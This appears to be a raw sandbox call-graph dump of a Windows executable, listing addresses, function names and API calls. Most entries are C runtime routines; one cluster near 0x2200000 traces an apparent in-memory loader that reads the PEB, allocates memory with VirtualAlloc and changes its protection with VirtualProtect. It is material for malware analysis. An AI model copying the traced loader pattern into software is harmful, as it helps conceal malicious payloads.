__dosmaperr __msize 12629->12631 12633 429cb8 __lock 42 API calls 12629->12633 12630->12631 12632 42598a HeapFree 12630->12632 12631->12595 12632->12631 12634 42599c 12632->12634 12637 42594d ___sbh_find_block 12633->12637 12635 427ffb __lseeki64_nolock 42 API calls 12634->12635 12636 4259a1 GetLastError 12635->12636 12636->12631 12638 425967 12637->12638 12789 429d1b 12637->12789 12793 425980 12638->12793 12642 42b24d __msize 12641->12642 12643 42b265 12642->12643 12653 42b284 _memset 12642->12653 12644 427ffb __lseeki64_nolock 43 API calls 12643->12644 12645 42b26a 12644->12645 12647 42515e _strcpy_s 4 API calls 12645->12647 12646 42b2f6 RtlAllocateHeap 12646->12653 12648 42b27a __msize 12647->12648 12648->12604 12653->12646 12653->12648 12654 429cb8 12653->12654 12661 42a4ca 12653->12661 12667 42b33d 12653->12667 12670 428053 12653->12670 12655 429ce0 RtlEnterCriticalSection 12654->12655 12656 429ccd 12654->12656 12655->12653 12673 429bf5 12656->12673 12658 429cd3 12658->12655 12699 42ad55 12658->12699 12662 42a4f8 12661->12662 12663 42a59a 12662->12663 12666 42a591 12662->12666 12764 42a031 12662->12764 12663->12653 12666->12663 12771 42a0e1 12666->12771 12775 429bde RtlLeaveCriticalSection 12667->12775 12669 42b344 12669->12653 12671 4280fe __decode_pointer 4 API calls 12670->12671 12672 428063 12671->12672 12672->12653 12674 429c01 __msize 12673->12674 12675 429c27 12674->12675 12706 42b208 12674->12706 12683 429c37 __msize 12675->12683 12752 42d5ca 12675->12752 12681 429c58 12687 429cb8 __lock 44 API calls 12681->12687 12682 429c49 12686 427ffb __lseeki64_nolock 44 API calls 12682->12686 12683->12658 12686->12683 12688 429c5f 12687->12688 12689 429c93 12688->12689 12690 429c67 12688->12690 12691 42592a __getptd_noexit 44 API calls 12689->12691 12757 4303e6 12690->12757 12693 429c84 12691->12693 12761 429caf 12693->12761 12694 429c72 12694->12693 12695 42592a __getptd_noexit 44 API calls 12694->12695 12697 429c7e 12695->12697 12698 427ffb __lseeki64_nolock 44 API calls 12697->12698 12698->12693 12700 42b208 __FF_MSGBANNER 44 API calls 12699->12700 12701 42ad5f 12700->12701 12702 42b05d __NMSG_WRITE 44 API calls 12701->12702 12703 42ad67 12702->12703 12704 4280fe __decode_pointer 4 API calls 12703->12704 12705 429cdf 12704->12705 12705->12655 12707 42d57f __set_error_mode 44 API calls 12706->12707 12708 42b20f 12707->12708 12709 42b21c 12708->12709 12710 42d57f __set_error_mode 44 API calls 12708->12710 12711 42b05d __NMSG_WRITE 44 API calls 12709->12711 12713 429c16 12709->12713 12710->12709 12712 42b234 12711->12712 12714 42b05d __NMSG_WRITE 44 API calls 12712->12714 12715 42b05d 12713->12715 12714->12713 12716 42b071 12715->12716 12717 42d57f __set_error_mode 41 API calls 12716->12717 12748 429c1d 12716->12748 12718 42b093 12717->12718 12719 42b1d1 GetStdHandle 12718->12719 12721 42d57f __set_error_mode 41 API calls 12718->12721 12720 42b1df _strlen 12719->12720 12719->12748 12724 42b1f8 WriteFile 12720->12724 12720->12748 12722 42b0a4 12721->12722 12722->12719 12723 42b0b6 12722->12723 12725 428620 _strcpy_s 41 API calls 12723->12725 12723->12748 12724->12748 12726 42b0d8 12725->12726 12727 42b0ec GetModuleFileNameA 12726->12727 12728 425036 __invoke_watson 10 API calls 12726->12728 12729 42b10a 12727->12729 12734 42b12d _strlen 12727->12734 12730 42b0e9 12728->12730 12731 428620 _strcpy_s 41 API calls 12729->12731 12730->12727 12732 42b11a 12731->12732 12733 425036 __invoke_watson 10 API calls 12732->12733 12732->12734 12733->12734 12736 431037 __mbsnbcpy_s_l 41 API calls 12734->12736 12745 42b170 12734->12745 12735 430fc3 _strcat_s 41 API calls 12737 42b183 12735->12737 12738 42b15d 12736->12738 12739 42b194 12737->12739 12741 425036 __invoke_watson 10 API calls 12737->12741 12743 425036 __invoke_watson 10 API calls 12738->12743 12738->12745 12740 430fc3 _strcat_s 41 API calls 12739->12740 12742 42b1a8 12740->12742 12741->12739 12744 42b1b9 12742->12744 12746 425036 __invoke_watson 10 API calls 12742->12746 12743->12745 12747 430e5a ___crtMessageBoxW 7 API calls 12744->12747 12745->12735 12746->12744 12747->12748 12749 42ada9 12748->12749 12750 42ad7e ___crtCorExitProcess GetModuleHandleW GetProcAddress 12749->12750 12751 42adb6 ExitProcess 12750->12751 12756 42d5d3 12752->12756 12753 425aa0 _malloc 43 API calls 12753->12756 12754 429c42 12754->12681 12754->12682 12755 42d5ea Sleep 12755->12756 12756->12753 12756->12754 12756->12755 12758 426fac __msize 12757->12758 12759 4303f2 InitializeCriticalSectionAndSpinCount 12758->12759 12760 430436 __msize 12759->12760 12760->12694 12762 429bde _doexit RtlLeaveCriticalSection 12761->12762 12763 429cb6 12762->12763 12763->12683 12765 42a044 RtlReAllocateHeap 12764->12765 12766 42a078 RtlAllocateHeap 12764->12766 12767 42a062 12765->12767 12768 42a066 12765->12768 12766->12767 12769 42a09b VirtualAlloc 12766->12769 12767->12666 12768->12766 12769->12767 12770 42a0b5 HeapFree 12769->12770 12770->12767 12772 42a0f8 VirtualAlloc 12771->12772 12774 42a13f 12772->12774 12774->12663 12775->12669 12777 42ad30 Sleep GetModuleHandleW 12776->12777 12778 42814d 12777->12778 12779 42ad4e 12777->12779 12778->12608 12778->12612 12779->12777 12779->12778 12780->12616 12787 429bde RtlLeaveCriticalSection 12781->12787 12783 428281 12783->12624 12788 429bde RtlLeaveCriticalSection 12784->12788 12786 4282cf 12786->12627 12787->12783 12788->12786 12790 429ffc 12789->12790 12791 429d5a 12789->12791 12790->12638 12791->12790 12792 429fc1 HeapFree 12791->12792 12792->12790 12796 429bde RtlLeaveCriticalSection 12793->12796 12795 425987 12795->12630 12796->12795 12800 429bde RtlLeaveCriticalSection 12797->12800 12799 42aa3f 12799->12538 12799->12542 12800->12799 12802 425b53 12801->12802 12815 425ab2 12801->12815 12803 428053 _realloc 4 API calls 12802->12803 12804 425b59 12803->12804 12806 427ffb __lseeki64_nolock 44 API calls 12804->12806 12805 42b208 __FF_MSGBANNER 44 API calls 12805->12815 12809 425b4b 12806->12809 12808 42b05d __NMSG_WRITE 44 API calls 12808->12815 12809->12573 12810 42ada9 _doexit 3 API calls 12810->12815 12811 425b3f 12812 427ffb __lseeki64_nolock 44 API calls 12811->12812 12814 425b44 12812->12814 12813 428053 _realloc 4 API calls 12813->12815 12816 427ffb __lseeki64_nolock 44 API calls 12814->12816 12815->12805 12815->12808 12815->12809 12815->12810 12815->12811 12815->12813 12815->12814 12820 425a51 12815->12820 12816->12809 12832 429bde RtlLeaveCriticalSection 12817->12832 12819 42a8fa 12819->12580 12821 425a5d __msize 12820->12821 12822 425a8e __msize 12821->12822 12823 429cb8 __lock 44 API calls 12821->12823 12822->12815 12824 425a73 12823->12824 12825 42a4ca ___sbh_alloc_block 5 API calls 12824->12825 12826 425a7e 12825->12826 12828 425a97 12826->12828 12831 429bde RtlLeaveCriticalSection 12828->12831 12830 425a9e 12830->12822 12831->12830 12832->12819 12834 425316 _memset 12833->12834 12840 425312 12833->12840 12835 42531b 12834->12835 12839 425365 12834->12839 12834->12840 12836 427ffb __lseeki64_nolock 44 API calls 12835->12836 12837 425320 12836->12837 12838 42515e _strcpy_s 4 API calls 12837->12838 12838->12840 12839->12840 12841 427ffb __lseeki64_nolock 44 API calls 12839->12841 12840->12512 12841->12837 12842->12512 12844 4272c1 12843->12844 12845 4272d7 RtlEnterCriticalSection 12843->12845 12846 429cb8 __lock 44 API calls 12844->12846 12845->12461 12847 4272ca 12846->12847 12847->12461 12882 42f340 12848->12882 12852 427366 __stbuf 12853 42d5ca __malloc_crt 44 API calls 12852->12853 12854 4273b3 12852->12854 12853->12854 12854->12464 12897 425dd8 12855->12897 12858 42748c 12859 427ffb __lseeki64_nolock 44 API calls 12858->12859 12860 427491 12859->12860 12862 42515e _strcpy_s 4 API calls 12860->12862 12861 42f340 __fileno 44 API calls 12873 4274cd __aulldvrm _strlen 12861->12873 12863 4274a3 12862->12863 12908 426e9b 12863->12908 12865 427f96 12865->12466 12867 42f5e5 70 API calls _write_multi_char 12867->12873 12868 42592a __getptd_noexit 44 API calls 12868->12873 12869 42f63e 70 API calls _write_string 12869->12873 12870 42f618 70 API calls _write_multi_char 12870->12873 12871 42f4de 48 API calls __cftof 12871->12873 12872 4280fe GetModuleHandleW GetProcAddress Sleep GetModuleHandleW __decode_pointer 12872->12873 12873->12858 12873->12863 12873->12867 12873->12868 12873->12869 12873->12870 12873->12871 12873->12872 12905 42f4fb 12873->12905 12875 4273f8 12874->12875 12876 424f66 12874->12876 12875->12876 13107 42c98c 12875->13107 12878 424f7e 12876->12878 12879 424f83 __stbuf 12878->12879 13249 427322 12879->13249 12881 424f8e 12881->12462 12883 42f34f 12882->12883 12884 427360 12882->12884 12885 427ffb __lseeki64_nolock 44 API calls 12883->12885 12888 42f2dc 12884->12888 12886 42f354 12885->12886 12887 42515e _strcpy_s 4 API calls 12886->12887 12887->12884 12889 42f2f8 12888->12889 12890 42f2e9 12888->12890 12892 427ffb __lseeki64_nolock 44 API calls 12889->12892 12895 42f31c 12889->12895 12891 427ffb __lseeki64_nolock 44 API calls 12890->12891 12893 42f2ee 12891->12893 12894 42f30c 12892->12894 12893->12852 12896 42515e _strcpy_s 4 API calls 12894->12896 12895->12852 12896->12895 12898 425deb 12897->12898 12899 425e38 12897->12899 12916 42834a 12898->12916 12899->12858 12899->12861 12899->12873 12902 425e18 12902->12899 12936 42bbde 12902->12936 12906 425dd8 _LocaleUpdate::_LocaleUpdate 46 API calls 12905->12906 12907 42f50e 12906->12907 12907->12873 12909 426ea3 12908->12909 12910 426ea5 IsDebuggerPresent 12908->12910 12909->12865 13106 42807b 12910->13106 12913 42edb3 SetUnhandledExceptionFilter UnhandledExceptionFilter 12914 42edd0 __invoke_watson 12913->12914 12915 42edd8 GetCurrentProcess TerminateProcess 12913->12915 12914->12915 12915->12865 12917 4282d1 __getptd_noexit 44 API calls 12916->12917 12918 428352 12917->12918 12919 425df0 12918->12919 12920 42ad55 __amsg_exit 44 API calls 12918->12920 12919->12902 12921 42c34a 12919->12921 12920->12919 12922 42c356 __msize 12921->12922 12923 42834a __getptd 44 API calls 12922->12923 12924 42c35b 12923->12924 12925 42c389 12924->12925 12927 42c36d 12924->12927 12926 429cb8 __lock 44 API calls 12925->12926 12928 42c390 12926->12928 12929 42834a __getptd 44 API calls 12927->12929 12952 42c30c 12928->12952 12931 42c372 12929->12931 12934 42c380 __msize 12931->12934 12935 42ad55 __amsg_exit 44 API calls 12931->12935 12934->12902 12935->12934 12937 42bbea __msize 12936->12937 12938 42834a __getptd 44 API calls 12937->12938 12939 42bbef 12938->12939 12940 429cb8 __lock 44 API calls 12939->12940 12941 42bc01 12939->12941 12942 42bc1f 12940->12942 12944 42bc0f __msize 12941->12944 12948 42ad55 __amsg_exit 44 API calls 12941->12948 12943 42bc68 12942->12943 12945 42bc50 InterlockedIncrement 12942->12945 12946 42bc36 InterlockedDecrement 12942->12946 13102 42bc79 12943->13102 12944->12899 12945->12943 12946->12945 12949 42bc41 12946->12949 12948->12944 12949->12945 12950 42592a __getptd_noexit 44 API calls 12949->12950 12951 42bc4f 12950->12951 12951->12945 12953 42c310 ___addlocaleref ___removelocaleref 12952->12953 12955 42c342 12952->12955 12953->12955 12959 42c09b 12953->12959 12956 42c3b4 12955->12956 13101 429bde RtlLeaveCriticalSection 12956->13101 12958 42c3bb 12958->12931 12960 42c11f 12959->12960 12961 42c0b2 12959->12961 12962 42c16c 12960->12962 12963 42592a __getptd_noexit 44 API calls 12960->12963 12961->12960 12968 42c0e6 12961->12968 12973 42592a __getptd_noexit 44 API calls 12961->12973 12969 42c193 12962->12969 13013 43155a 12962->13013 12965 42c140 12963->12965 12967 42592a __getptd_noexit 44 API calls 12965->12967 12970 42c153 12967->12970 12975 42592a __getptd_noexit 44 API calls 12968->12975 12988 42c107 12968->12988 12972 42c1d8 12969->12972 12982 42592a 44 API calls __getptd_noexit 12969->12982 12976 42592a __getptd_noexit 44 API calls 12970->12976 12971 42592a __getptd_noexit 44 API calls 12977 42c114 12971->12977 12978 42592a __getptd_noexit 44 API calls 12972->12978 12979 42c0db 12973->12979 12974 42592a __getptd_noexit 44 API calls 12974->12969 12980 42c0fc 12975->12980 12981 42c161 12976->12981 12983 42592a __getptd_noexit 44 API calls 12977->12983 12984 42c1de 12978->12984 12989 431734 12979->12989 13005 4316ef 12980->13005 12987 42592a __getptd_noexit 44 API calls 12981->12987 12982->12969 12983->12960 12984->12955 12987->12962 12988->12971 12990 431741 12989->12990 13004 4317be 12989->13004 12991 431752 12990->12991 12992 42592a __getptd_noexit 44 API calls 12990->12992 12993 431764 12991->12993 12995 42592a __getptd_noexit 44 API calls 12991->12995 12992->12991 12994 431776 12993->12994 12996 42592a __getptd_noexit 44 API calls 12993->12996 12997 431788 12994->12997 12998 42592a __getptd_noexit 44 API calls 12994->12998 12995->12993 12996->12994 12999 42592a __getptd_noexit 44 API calls 12997->12999 13001 43179a 12997->13001 12998->12997 12999->13001 13000 4317ac 13003 42592a __getptd_noexit 44 API calls 13000->13003 13000->13004 13001->13000 13002 42592a __getptd_noexit 44 API calls 13001->13002 13002->13000 13003->13004 13004->12968 13006 4316fc 13005->13006 13012 431730 13005->13012 13007 43170c 13006->13007 13008 42592a __getptd_noexit 44 API calls 13006->13008 13009 43171e 13007->13009 13010 42592a __getptd_noexit 44 API calls 13007->13010 13008->13007 13011 42592a __getptd_noexit 44 API calls 13009->13011 13009->13012 13010->13009 13011->13012 13012->12988 13014 43156b 13013->13014 13015 42c18c 13013->13015 13016 42592a __getptd_noexit 44 API calls 13014->13016 13015->12974 13017 431573 13016->13017 13018 42592a __getptd_noexit 44 API calls 13017->13018 13019 43157b 13018->13019 13020 42592a __getptd_noexit 44 API calls 13019->13020 13021 431583 13020->13021 13022 42592a __getptd_noexit 44 API calls 13021->13022 13023 43158b 13022->13023 13024 42592a __getptd_noexit 44 API calls 13023->13024 13025 431593 13024->13025 13026 42592a __getptd_noexit 44 API calls 13025->13026 13027 43159b 13026->13027 13028 42592a __getptd_noexit 44 API calls 13027->13028 13029 4315a2 13028->13029 13030 42592a __getptd_noexit 44 API calls 13029->13030 13031 4315aa 13030->13031 13032 42592a __getptd_noexit 44 API calls 13031->13032 13033 4315b2 13032->13033 13034 42592a __getptd_noexit 44 API calls 13033->13034 13035 4315ba 13034->13035 13036 42592a __getptd_noexit 44 API calls 13035->13036 13037 4315c2 13036->13037 13038 42592a __getptd_noexit 44 API calls 13037->13038 13039 4315ca 13038->13039 13040 42592a __getptd_noexit 44 API calls 13039->13040 13041 4315d2 13040->13041 13042 42592a __getptd_noexit 44 API calls 13041->13042 13043 4315da 13042->13043 13044 42592a __getptd_noexit 44 API calls 13043->13044 13045 4315e2 13044->13045 13046 42592a __getptd_noexit 44 API calls 13045->13046 13047 4315ea 13046->13047 13048 42592a __getptd_noexit 44 API calls 13047->13048 13049 4315f5 13048->13049 13050 42592a __getptd_noexit 44 API calls 13049->13050 13051 4315fd 13050->13051 13052 42592a __getptd_noexit 44 API calls 13051->13052 13053 431605 13052->13053 13054 42592a __getptd_noexit 44 API calls 13053->13054 13055 43160d 13054->13055 13056 42592a __getptd_noexit 44 API calls 13055->13056 13057 431615 13056->13057 13058 42592a __getptd_noexit 44 API calls 13057->13058 13059 43161d 13058->13059 13060 42592a __getptd_noexit 44 API calls 13059->13060 13061 431625 13060->13061 13062 42592a __getptd_noexit 44 API calls 13061->13062 13063 43162d 13062->13063 13064 42592a __getptd_noexit 44 API calls 13063->13064 13065 431635 13064->13065 13066 42592a __getptd_noexit 44 API calls 13065->13066 13067 43163d 13066->13067 13068 42592a __getptd_noexit 44 API calls 13067->13068 13069 431645 13068->13069 13070 42592a __getptd_noexit 44 API calls 13069->13070 13071 43164d 13070->13071 13072 42592a __getptd_noexit 44 API calls 13071->13072 13073 431655 13072->13073 13074 42592a __getptd_noexit 44 API calls 13073->13074 13075 43165d 13074->13075 13076 42592a __getptd_noexit 44 API calls 13075->13076 13077 431665 13076->13077 13078 42592a __getptd_noexit 44 API calls 13077->13078 13079 43166d 13078->13079 13080 42592a __getptd_noexit 44 API calls 13079->13080 13081 43167b 13080->13081 13082 42592a __getptd_noexit 44 API calls 13081->13082 13083 431686 13082->13083 13084 42592a __getptd_noexit 44 API calls 13083->13084 13085 431691 13084->13085 13086 42592a __getptd_noexit 44 API calls 13085->13086 13087 43169c 13086->13087 13088 42592a __getptd_noexit 44 API calls 13087->13088 13089 4316a7 13088->13089 13090 42592a __getptd_noexit 44 API calls 13089->13090 13091 4316b2 13090->13091 13092 42592a __getptd_noexit 44 API calls 13091->13092 13093 4316bd 13092->13093 13094 42592a __getptd_noexit 44 API calls 13093->13094 13095 4316c8 13094->13095 13096 42592a __getptd_noexit 44 API calls 13095->13096 13097 4316d3 13096->13097 13098 42592a __getptd_noexit 44 API calls 13097->13098 13099 4316de 13098->13099 13100 42592a __getptd_noexit 44 API calls 13099->13100 13100->13015 13101->12958 13105 429bde RtlLeaveCriticalSection 13102->13105 13104 42bc80 13104->12941 13105->13104 13106->12913 13108 42c9a5 13107->13108 13112 42c9c7 13107->13112 13109 42f340 __fileno 44 API calls 13108->13109 13108->13112 13110 42c9c0 13109->13110 13113 430d17 13110->13113 13112->12876 13114 430d23 __msize 13113->13114 13115 430d46 13114->13115 13116 430d2b 13114->13116 13118 430d54 13115->13118 13122 430d95 13115->13122 13138 42800e 13116->13138 13119 42800e __free_osfhnd 44 API calls 13118->13119 13121 430d59 13119->13121 13124 427ffb __lseeki64_nolock 44 API calls 13121->13124 13141 43341e 13122->13141 13123 427ffb __lseeki64_nolock 44 API calls 13131 430d38 __msize 13123->13131 13126 430d60 13124->13126 13128 42515e _strcpy_s 4 API calls 13126->13128 13127 430d9b 13129 430da8 13127->13129 13130 430dbe 13127->13130 13128->13131 13151 4305e4 13129->13151 13133 427ffb __lseeki64_nolock 44 API calls 13130->13133 13131->13112 13134 430dc3 13133->13134 13136 42800e __free_osfhnd 44 API calls 13134->13136 13135 430db6 13210 430de9 13135->13210 13136->13135 13139 4282d1 __getptd_noexit 44 API calls 13138->13139 13140 428013 13139->13140 13140->13123 13142 43342a __msize 13141->13142 13143 433485 13142->13143 13146 429cb8 __lock 44 API calls 13142->13146 13144 4334a7 __msize 13143->13144 13145 43348a RtlEnterCriticalSection 13143->13145 13144->13127 13145->13144 13147 433456 13146->13147 13149 4303e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 13147->13149 13150 43346d 13147->13150 13149->13150 13213 4334b5 13150->13213 13152 4305f3 __write_nolock 13151->13152 13153 430625 13152->13153 13154 43064c 13152->13154 13182 43061a 13152->13182 13155 42800e __free_osfhnd 44 API calls 13153->13155 13158 4306b4 13154->13158 13159 43068e 13154->13159 13157 43062a 13155->13157 13156 426e9b ___convertcp 5 API calls 13160 430d15 13156->13160 13162 427ffb __lseeki64_nolock 44 API calls 13157->13162 13161 4306c8 13158->13161 13217 430446 13158->13217 13163 42800e __free_osfhnd 44 API calls 13159->13163 13160->13135 13166 42f2dc __stbuf 44 API calls 13161->13166 13165 430631 13162->13165 13167 430693 13163->13167 13168 42515e _strcpy_s 4 API calls 13165->13168 13169 4306d3 13166->13169 13170 427ffb __lseeki64_nolock 44 API calls 13167->13170 13168->13182 13172 430979 13169->13172 13176 42834a __getptd 44 API calls 13169->13176 13171 43069c 13170->13171 13173 42515e _strcpy_s 4 API calls 13171->13173 13174 430989 13172->13174 13175 430c48 WriteFile 13172->13175 13173->13182 13178 430a67 13174->13178 13198 43099d 13174->13198 13177 430c7b GetLastError 13175->13177 13204 43095b 13175->13204 13179 4306ee GetConsoleMode 13176->13179 13177->13204 13197 430b47 13178->13197 13200 430a76 13178->13200 13179->13172 13181 430719 13179->13181 13180 430cc6 13180->13182 13184 427ffb __lseeki64_nolock 44 API calls 13180->13184 13181->13172 13183 43072b GetConsoleCP 13181->13183 13182->13156 13183->13204 13206 43074e 13183->13206 13187 430ce9 13184->13187 13185 430c99 13189 430ca4 13185->13189 13190 430cb8 13185->13190 13186 430a0b WriteFile 13186->13177 13186->13198 13191 42800e __free_osfhnd 44 API calls 13187->13191 13188 430bad WideCharToMultiByte 13188->13177 13193 430be4 WriteFile 13188->13193 13192 427ffb __lseeki64_nolock 44 API calls 13189->13192 13230 428021 13190->13230 13191->13182 13199 430ca9 13192->13199 13196 430c1b GetLastError 13193->13196 13193->13197 13194 430aeb WriteFile 13194->13177 13194->13200 13196->13197 13197->13180 13197->13188 13197->13193 13197->13204 13198->13180 13198->13186 13198->13204 13202 42800e __free_osfhnd 44 API calls 13199->13202 13200->13180 13200->13194 13200->13204 13202->13182 13203 4336c1 48 API calls __fassign 13203->13206 13204->13180 13204->13182 13204->13185 13205 4334e5 11 API calls __putwch_nolock 13205->13206 13206->13177 13206->13203 13206->13204 13206->13205 13207 4307fa WideCharToMultiByte 13206->13207 13209 43087f WriteFile 13206->13209 13227 42f533 13206->13227 13207->13204 13208 43082b WriteFile 13207->13208 13208->13177 13208->13206 13209->13177 13209->13206 13248 4334be RtlLeaveCriticalSection 13210->13248 13212 430df1 13212->13131 13216 429bde RtlLeaveCriticalSection 13213->13216 13215 4334bc 13215->13143 13216->13215 13235 4333a7 13217->13235 13219 430464 13220 43047d SetFilePointer 13219->13220 13221 43046c 13219->13221 13222 430495 GetLastError 13220->13222 13225 430471 13220->13225 13223 427ffb __lseeki64_nolock 44 API calls 13221->13223 13224 43049f 13222->13224 13222->13225 13223->13225 13226 428021 __dosmaperr 44 API calls 13224->13226 13225->13161 13226->13225 13228 42f4fb __isleadbyte_l 46 API calls 13227->13228 13229 42f542 13228->13229 13229->13206 13231 42800e __free_osfhnd 44 API calls 13230->13231 13232 42802c __dosmaperr 13231->13232 13233 427ffb __lseeki64_nolock 44 API calls 13232->13233 13234 42803f 13233->13234 13234->13182 13236 4333b4 13235->13236 13237 4333cc 13235->13237 13238 42800e __free_osfhnd 44 API calls 13236->13238 13239 42800e __free_osfhnd 44 API calls 13237->13239 13244 433411 13237->13244 13240 4333b9 13238->13240 13241 4333fa 13239->13241 13242 427ffb __lseeki64_nolock 44 API calls 13240->13242 13243 427ffb __lseeki64_nolock 44 API calls 13241->13243 13245 4333c1 13242->13245 13246 433401 13243->13246 13244->13219 13245->13219 13247 42515e _strcpy_s 4 API calls 13246->13247 13247->13244 13248->13212 13250 427332 13249->13250 13251 427345 RtlLeaveCriticalSection 13249->13251 13254 429bde RtlLeaveCriticalSection 13250->13254 13251->12881 13253 427342 13253->12881 13254->13253 13256 411191 DeleteObject 13255->13256 13257 41119c 13255->13257 13256->13257 13258 4111b0 DeleteObject 13257->13258 13260 4111bb 13257->13260 13258->13260 13259 4113bc 13260->13259 13262 411207 13260->13262 13277 411450 13260->13277 13263 4112ca 13262->13263 13264 42592a __getptd_noexit 44 API calls 13262->13264 13273 411244 13262->13273 13264->13262 13265 4112c0 13298 41fe50 RaiseException 13265->13298 13266 42592a __getptd_noexit 44 API calls 13271 411285 13266->13271 13267 4112a6 13268 41116e 13267->13268 13272 423d8e 2 API calls 13267->13272 13268->12473 13274 423d8e 13268->13274 13271->13266 13271->13267 13272->13268 13273->13265 13273->13271 13289 4113d0 13273->13289 13386 423cad 13274->13386 13276 423d9b 13276->12473 13278 41153a 13277->13278 13284 411463 13277->13284 13283 411546 13278->13283 13311 41fe50 RaiseException 13278->13311 13280 41165f 13280->13260 13281 411708 13282 42592a __getptd_noexit 44 API calls 13282->13283 13283->13280 13283->13282 13284->13281 13284->13283 13284->13284 13299 423acb 13284->13299 13287 41166e 13312 41fe50 RaiseException 13287->13312 13294 4113d8 13289->13294 13295 411403 13289->13295 13290 41142c 13290->13273 13291 41143b 13385 41fe50 RaiseException 13291->13385 13292 42592a __getptd_noexit 44 API calls 13292->13295 13294->13291 13294->13295 13297 4113d0 45 API calls 13294->13297 13295->13290 13295->13292 13296 411445 13297->13294 13298->13263 13301 424fc2 13299->13301 13300 425aa0 _malloc 44 API calls 13300->13301 13301->13300 13302 41152d 13301->13302 13303 428053 _realloc 4 API calls 13301->13303 13305 424fe8 std::bad_alloc::bad_alloc 13301->13305 13302->13278 13302->13287 13303->13301 13309 42500e 13305->13309 13313 426b6a 13305->13313 13316 41e020 13309->13316 13310 425026 13311->13283 13312->13283 13322 426b2e 13313->13322 13315 426b77 13315->13309 13370 425215 13316->13370 13319 4252b6 13320 4252eb RaiseException 13319->13320 13321 4252df 13319->13321 13320->13310 13321->13320 13323 426b3a __msize 13322->13323 13330 42adc1 13323->13330 13329 426b5b __msize 13329->13315 13331 429cb8 __lock 44 API calls 13330->13331 13332 426b3f 13331->13332 13333 426a43 13332->13333 13334 4280fe __decode_pointer 4 API calls 13333->13334 13335 426a57 13334->13335 13336 4280fe __decode_pointer 4 API calls 13335->13336 13337 426a67 13336->13337 13338 426aea 13337->13338 13339 42a9ca __msize 45 API calls 13337->13339 13350 426b64 13338->13350 13343 426a85 13339->13343 13340 426ad1 13341 428083 __encode_pointer 4 API calls 13340->13341 13342 426adf 13341->13342 13345 428083 __encode_pointer 4 API calls 13342->13345 13343->13340 13344 426aa9 13343->13344 13353 42d65b 13343->13353 13344->13338 13347 42d65b __realloc_crt 50 API calls 13344->13347 13348 426abf 13344->13348 13345->13338 13347->13348 13348->13338 13358 428083 13348->13358 13366 42adca 13350->13366 13357 42d664 13353->13357 13354 42a7af _realloc 49 API calls 13354->13357 13355 42d6a3 13355->13344 13356 42d684 Sleep 13356->13357 13357->13354 13357->13355 13357->13356 13364 428097 13358->13364 13359 4280bc GetModuleHandleW 13360 4280d7 GetProcAddress 13359->13360 13361 4280cc 13359->13361 13365 4280b4 13360->13365 13362 42ad25 __crt_waiting_on_module_handle 2 API calls 13361->13362 13363 4280d2 13362->13363 13363->13360 13363->13365 13364->13359 13364->13365 13365->13340 13369 429bde RtlLeaveCriticalSection 13366->13369 13368 426b69 13368->13329 13369->13368 13371 41e02c 13370->13371 13372 425235 _strlen 13370->13372 13371->13319 13372->13371 13373 425aa0 _malloc 44 API calls 13372->13373 13374 425248 13373->13374 13374->13371 13376 428620 13374->13376 13377 428631 13376->13377 13378 428638 13376->13378 13377->13378 13380 42865e 13377->13380 13379 427ffb __lseeki64_nolock 44 API calls 13378->13379 13384 42863d 13379->13384 13382 42864c 13380->13382 13383 427ffb __lseeki64_nolock 44 API calls 13380->13383 13381 42515e _strcpy_s 4 API calls 13381->13382 13382->13371 13383->13384 13384->13381 13385->13296 13387 423cd0 13386->13387 13388 423cbf GetProcessHeap HeapFree 13386->13388 13387->13276 13388->13276 12129 40fcc0 12134 40fe50 12129->12134 12132 40fd96 12132->12132 12133 40fdcd CreateFontIndirectA GetSysColor 12132->12133 12135 40fd4f CreatePen 12134->12135 12135->12132 12136 22015a4 12144 22014a0 12136->12144 12138 22015c7 12139 2201609 12138->12139 12174 2200000 12138->12174 12148 22056f4 12139->12148 12161 2203124 12139->12161 12141 220164d 12147 22014ce 12144->12147 12145 2201542 12145->12138 12147->12145 12179 2201360 12147->12179 12149 2205702 12148->12149 12150 2205708 12149->12150 12153 220575f 12149->12153 12151 22052c4 4 API calls 12150->12151 12152 2205749 12151->12152 12152->12141 12193 2205204 12153->12193 12155 22057c0 12198 22052c4 12155->12198 12157 22057f1 12215 2203764 12157->12215 12159 22057fd 12159->12152 12160 2203124 6 API calls 12159->12160 12160->12152 12162 22056f4 12161->12162 12163 2205708 12162->12163 12165 220575f 12162->12165 12164 22052c4 4 API calls 12163->12164 12166 2205749 12164->12166 12167 2205204 3 API calls 12165->12167 12166->12141 12168 22057c0 12167->12168 12169 22052c4 4 API calls 12168->12169 12170 22057f1 12169->12170 12171 2203764 GlobalAlloc 12170->12171 12172 22057fd 12171->12172 12172->12166 12173 2203124 6 API calls 12172->12173 12173->12166 12175 2201570 12174->12175 12259 2201560 GetPEB 12175->12259 12177 2201583 12260 22015a4 12177->12260 12184 2200570 12179->12184 12181 220147f 12181->12147 12182 2201379 12182->12181 12187 2200540 12182->12187 12190 22002f0 12184->12190 12186 220057b VirtualAlloc 12186->12182 12188 22002f0 12187->12188 12189 220054b VirtualFree 12188->12189 12189->12181 12192 22002f5 12190->12192 12194 2203764 GlobalAlloc 12193->12194 12197 2205232 12194->12197 12195 22052a6 12195->12155 12197->12195 12218 22050c4 12197->12218 12199 2205322 12198->12199 12200 2205377 12199->12200 12204 22053e4 12199->12204 12201 22053ae 12200->12201 12202 2203854 VirtualAlloc 12200->12202 12203 2203854 VirtualAlloc 12201->12203 12206 22053dc 12201->12206 12202->12201 12203->12206 12204->12206 12248 2203894 12204->12248 12209 22054fc 12206->12209 12251 2204654 12206->12251 12208 2203894 VirtualProtect 12211 2205548 12208->12211 12209->12208 12210 22055b9 12255 2203134 GetPEB 12210->12255 12211->12210 12213 2203894 VirtualProtect 12211->12213 12213->12211 12214 22055ca 12214->12157 12216 2203424 12215->12216 12217 220376f GlobalAlloc 12216->12217 12217->12159 12229 2203854 12218->12229 12220 22050dd 12221 2203764 GlobalAlloc 12220->12221 12222 220512f 12221->12222 12232 2204f34 12222->12232 12224 220515e 12238 2204de4 12224->12238 12226 22051b8 12227 22051e3 12226->12227 12242 2203824 12226->12242 12227->12197 12245 2203424 12229->12245 12231 220385f VirtualAlloc 12231->12220 12233 2203764 GlobalAlloc 12232->12233 12237 2204f5a 12233->12237 12234 22050b1 12234->12224 12235 2203764 GlobalAlloc 12235->12237 12236 2204de4 GlobalAlloc 12236->12237 12237->12234 12237->12235 12237->12236 12239 2204df3 12238->12239 12240 2203764 GlobalAlloc 12239->12240 12241 2204e4e 12240->12241 12241->12226 12243 2203424 